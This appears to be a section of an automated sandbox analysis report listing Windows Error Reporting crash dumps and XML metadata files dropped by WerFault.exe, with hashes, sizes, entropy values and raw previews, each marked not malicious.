Preview:	MDMP..a..... ..........f............4...............H.......<....#......d....4..........`.......8...........T............=..&p..........8$..........$&..............................................................................eJ.......&......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CC5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8316
Entropy (8bit):	3.7024848661240117
Encrypted:	false
SSDEEP:	192:R6l7wVeJVr6xy6YSYSUG9sgmfUmpDO89bySsf3Gm:R6lXJp6xy6YdSUGWgmfU8yRf/
MD5:	0FF9317AE7D6510195CBE9333908F2F6
SHA1:	1D6BFF8980016173D58516CFE0F90AE5917C2FD5
SHA-256:	707200C3FD162370DFE8CCD7DED5F561C94E99D92C91E4C3869DBC85FAE32E76
SHA-512:	AEFB3DE875B36B06471271C504D61D00763DDA68CBFB50B482D72890E48F5F8766DEC463C1175100384892B8C5C9CD28F8B1B7AA9D2D2F5E6980F43CE8611FBB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D34.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.477049641997945
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpYm8M4JQJvAF2m+q8Rgl1nXlGfd:uIjfxI7j37VVJQNZmIe1nXlGfd
MD5:	DB5A6DA5845DA9C53BE4801D683420BD
SHA1:	B2B6573926DAECBA6D853DA059DD7E93C89A784F
SHA-256:	D9342E772B3F29044EE2E75F1A9DDA013AE96C4CDE04A9E2BCEF769E4DE6436F
SHA-512:	47E08A30208BA2D439A782E0236DF784239283D8C1173EC8999DAF4D57E5DFFFD749A3C0CD12B0B393720F19437877CBAC88C9E115362DF385B4054AB2B29C4E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5379.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 25 05:58:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	21496
Entropy (8bit):	2.3966019358040374
Encrypted:	false
SSDEEP:	96:518pM/SiUmHjfppLuSX3xZvK/9fi7Yw2d81u8Kyj4S+mhpTuqWI0WIMIIXY9N8gY:AGeSXTQ9fO2u17Nj4Tmnuj9N8gtrC
MD5:	DF9C6D1BB4DEC23AAB0EF90684FF9C3B
SHA1:	424AF98BE2ECB3F8B83001DF6EDE3C44B9672BFA
SHA-256:	BE53B2EFBA3C1C462A0926ABCA80DF4187992D8FC1E2E2E07F6248A7AF6CB699
SHA-512:	A88CED51D426AB2EF380E863A1B41E3D87E6DADC53C76933A28B6BC30D1632DFB52D6F0C2E2F8A745A1D071F0F0CF4709B2AC5AB1FDFCF9DA8546F2383C6D0D8
Malicious:	false
Preview:	MDMP..a..... ..........f............4...............<.......t...............T.......8...........T...............xA......................................................................................................eJ......P.......GenuineIntel............T.......,......f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5407.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8266
Entropy (8bit):	3.6954922176559584
Encrypted:	false
SSDEEP:	192:R6l7wVeJNf6a6b6YFF6ZygmfEQppD+89bkxsfNsm:R6lXJl6z6YX6ZygmfEQLkqfT
MD5:	E1BA474728FF0B84B6B34A7A98A99F99
SHA1:	3435F7DFE3C9E6F4788651D6825D5E1BEDF37F5A
SHA-256:	FEA9998632542BCDA07181A3E11C16353CE181808E42C310883C035E5D5272CC
SHA-512:	1FD41589DBB035B258DBA90A64EC5C2A5B07E21838615A4B97C726B94D042E997C613E397FAD88DAF7D9FEBEC1AFD6ABC50B8C537AB5878E4CA02B7B751159F7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5456.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.432574045524762
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjLYm8M4Jg5AF96+q8JgpCVb1lUid:uIjfxI7j37VfJeC6YICVxlUid
MD5:	03D50410DEE16771BF24ED783C213C6F
SHA1:	EBF0F91175C55CAC451758FE3CF7122649DDC16B
SHA-256:	81276C950E38413DC3920FD710C7FC87E7F0F21ADD8C51AAA822C756FF0E4DA1
SHA-512:	A7E0E414DDD51375BCB3C0A74C9DE915FD2CADD5A7A55211A945F777860EB7737E24B4493FF7A0B6BB02FFD8BCC9D1A2679903B66B254004A213ACD270C15FAB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCC2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 25 05:59:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	43464
Entropy (8bit):	1.9356507490806907
Encrypted:	false
SSDEEP:	192:B7rpX766dOPDm5CByo6lXk0riGHknrbfHGiRadDCh9GV9vQ:1d66QPf4l6GiRaNd9v
MD5:	211EA119191875936EB12437C58421C3
SHA1:	F4B525AA735BBB579E2E09D1DE443BFB2B74FEBE
SHA-256:	12C6B713F5379564ACA98BAC24BF85E319BB111F99F8B2426234CC9419B7A5FB
SHA-512:	110E999BBEAC57A8048B7D8288AB75F9D90BDBD3E12162967B75DAA6B2A9EA18A0AF81BEF817901FE9B3737C9B0ACCEFD251E3B74BAF655F59093E6EB303750B
Malicious:	false
Preview:	MDMP..a..... ..........f....................................T....%..........T.......8...........T..........................\...........H...............................................................................eJ..............GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD02.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6308
Entropy (8bit):	3.721970604166861
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbEd63N9YsHFXtpW5aMOU089b9Zsfu4Gm:R6l7wVeJEd699YcQpB089b9Zsfu/m
MD5:	2F0F827FB9C8334E7EAC3A563B4F3C00
SHA1:	0FF2114095DFF8181831F7C06120156691BD5540
SHA-256:	CDF9080B6E11C9FD193FB14934F03EFA722CCC2B425A8B946A26F20F5434A666
SHA-512:	DA5F093E1A7D62603EF75F537B40552EE3DAD0B323B454D623F21E9290E6314D558C7017466F6C2DDFF5013E92C60BF75E03D85EB8051AB1AD0DA432AD0A4E7E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD22.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.476574998132688
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjzYm8M4JgKFX+q8gBCVb1lUl9d:uIjfxI7j37VzJd/CVxlUl9d
MD5:	54D8DFE353C0FA60FE20EA0B80C9E911
SHA1:	E3BB73B179368E054F7319003B78F133D45F2FFB
SHA-256:	47D961792EE848A8F39BB2A6B4BB45067E89612FB4EE1E47DED7C1D2856BBFB3
SHA-512:	C73F3AFE4AAFFF2CF369CA036E03422AF1385C99362EC44E4C865230FA1CAAD60227FCE5FF1A645425769E2CAFCD5F8D25FBDC4292F2F16333BB753090A21FA5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4F0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 25 05:59:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	64364
Entropy (8bit):	2.08249834320269
Encrypted:	false
SSDEEP:	192:f8FdVXImX/KscOPd8lSNEMREyxz39/+fJh6aXk0ft0k7EbccYV4965lFn7+onrb9:EFEmX/7TPc23RPz3RE3m0m9Z8Pn7Xp6
MD5:	577FD37CE08F07A9ACBA7D45EB66E3D5
SHA1:	56506D1A5B5476263C14A7A92DC4BF45F1E50262
SHA-256:	F2A175188D6D482587C0C1C1127D2AD19C9F5AF8E9224B019067B209DD9A61D9
SHA-512:	71C7EC1309A5CF4872EE7F90A707EE5F94C98D377A17197CB946F95BEE66C107F4CA3E605697E75ECC1CF24A775D8D16F2FD4F5BCCE4A5ABE194B7B8ADEB48C6
Malicious:	false
Preview:	MDMP..a..... ..........f............$...............,...........t/..........T.......8...........T...........X...........................................................................................................eJ......4.......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC56E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6326
Entropy (8bit):	3.7228486295392975
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbEn6Nt4YsHFXtpW5aMOUS89bvZsf0vlm:R6l7wVeJEn6YYcQpBS89bvZsf0vlm
MD5:	4011A7678D340DA301AA9F6F4FE5D24B
SHA1:	A5A2A9E73F13F048DB0E0D5140686941CAE769E4
SHA-256:	2F78BE0FA8B1569BFBAE4EAFAF3BBBC1A3A8524010F72E72C14AEB6FB1497E17
SHA-512:	941690C7ADC660560B17A26F57ED8BD98D3F0135DE1E3FB3F4EB0FEA1806E75858ECDA084BC677415C7470DCC9CCB17B85270F8905600B3A4AF842673A7AF522
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC58E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.4761616228650585
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjfYm8M4JgKFnP+q8gBCVb1lUl9d:uIjfxI7j37V7JxP/CVxlUl9d
MD5:	236A6D575B4052CD327453AA2F89E944
SHA1:	D7634E35BDF8714E3AC88E1DD93B48D8D5F1CDA1
SHA-256:	E35D1DADAC399DE9E319CE17C82DB2033FC84943E4CAA00523F462CF8CCF046A
SHA-512:	A11F9B560B2779D45F9B30E2305C72FAB2EDA2AFF0B0F6D0C16C83B4F8A40C3FA3E86810AD03C2CDC16358C35E646013E79B022A53B8B40DDE785CCFC8E002A9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC761.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 25 05:59:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	64256
Entropy (8bit):	2.106036156931213
Encrypted:	false
SSDEEP:	192:ahdVXImXbOPd4zojiREyF399u5s86aXk0fW35ZEbccYV4965lFn7+onrbXXUAydJ:CEmXiPMRv3a5D0Zm9Z8Pn7GAyD6y
MD5:	F148220C9BFF6F060816C80807083837
SHA1:	B2A02285D5DBDFE4D7B776BA26DD37807CD47740
SHA-256:	12B8785F95E18C4AEF7F29B6DE83ED81E2C5575FF0FE25415CE2E5775E5FE4CA
SHA-512:	B6887F98D81FF8A7F47BEAD913B1DDDAA366BA572FE40EF892F51D36374EDDA20AF68B3D7CCB4658ED77F72A6215F45E6FDC6A4B582626618DD3C3A1469F2733
Malicious:	false
Preview:	MDMP..a..... ..........f............$...............,...........t/..........T.......8...........T...............0.......................................................................................................eJ......4.......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7C0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6326
Entropy (8bit):	3.723672147284374
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbEF6Nt3mXleYsHFXtpW5aMOUI89b4bZsfjejm:R6l7wVeJEF6TYcQpBI89b4bZsfjejm
MD5:	4E75F80B0DFDD01008F69270BCE68B49
SHA1:	F6D8C8F2906BF2B41E8B5C2754B3F35BE33C7501
SHA-256:	EC493670A69B2F0FFC8CE5CFA96DE5B3D17DBDE1C9146C44C3BF9B4248E34174
SHA-512:	72FBBD43F7BC4EB36BDC7B06E53520303759BD5FF397FEDC0195351DA1B8DAA9520E5AE20AA054F86B95CCD75C08A70BC69E6A835AFA5F8BB069427A7CBAEA05
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7FF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.476756431075743
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjiYm8M4JgKFyc+q8gBCVb1lUl9d:uIjfxI7j37V6J8c/CVxlUl9d
MD5:	E93F8EC2CA00B8928649B2A6C296E1AD
SHA1:	5FB106E21950053EA3890E01CD269FF15BF9C3CB
SHA-256:	49EFE5A5150ED25A8B53788DBB856B39FEE37FFA69621B0A0212CE86A9B57FAE
SHA-512:	A15369D7C318CE4C6266CDEBDDEA917779B7B084C127FBD0CACB37088E51915B18948D32E1FBAE99D86CFB631C1D426631D0C8E77C357CA54DF0B8ACC15F4925
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9C2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Sep 25 05:59:07 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	71546
Entropy (8bit):	2.090783522301548
Encrypted:	false
SSDEEP:	384:RrGHyPEJP/5E09DXMUlqKp8Pn73V3sYF:RrYyPEJP/5r9DNlqq8P7ll
MD5:	8F4DEFF43F7B3D516170244231D1ADD9
SHA1:	63CEF8488CA395516370CA5827083663D5D8D2CD
SHA-256:	4E1C623A2D06600CBB34E478048478FBD7228BF03752B847B76702A4C2887B41
SHA-512:	7CD5FFDB1A47B00FD44EE0B389F326C064F189DA8B53C2450A10400181A69428E18D1815AEE1AEEF21A4C0A012C8711E0ED1E407A25B827809E708DB36B28D65
Malicious:	false
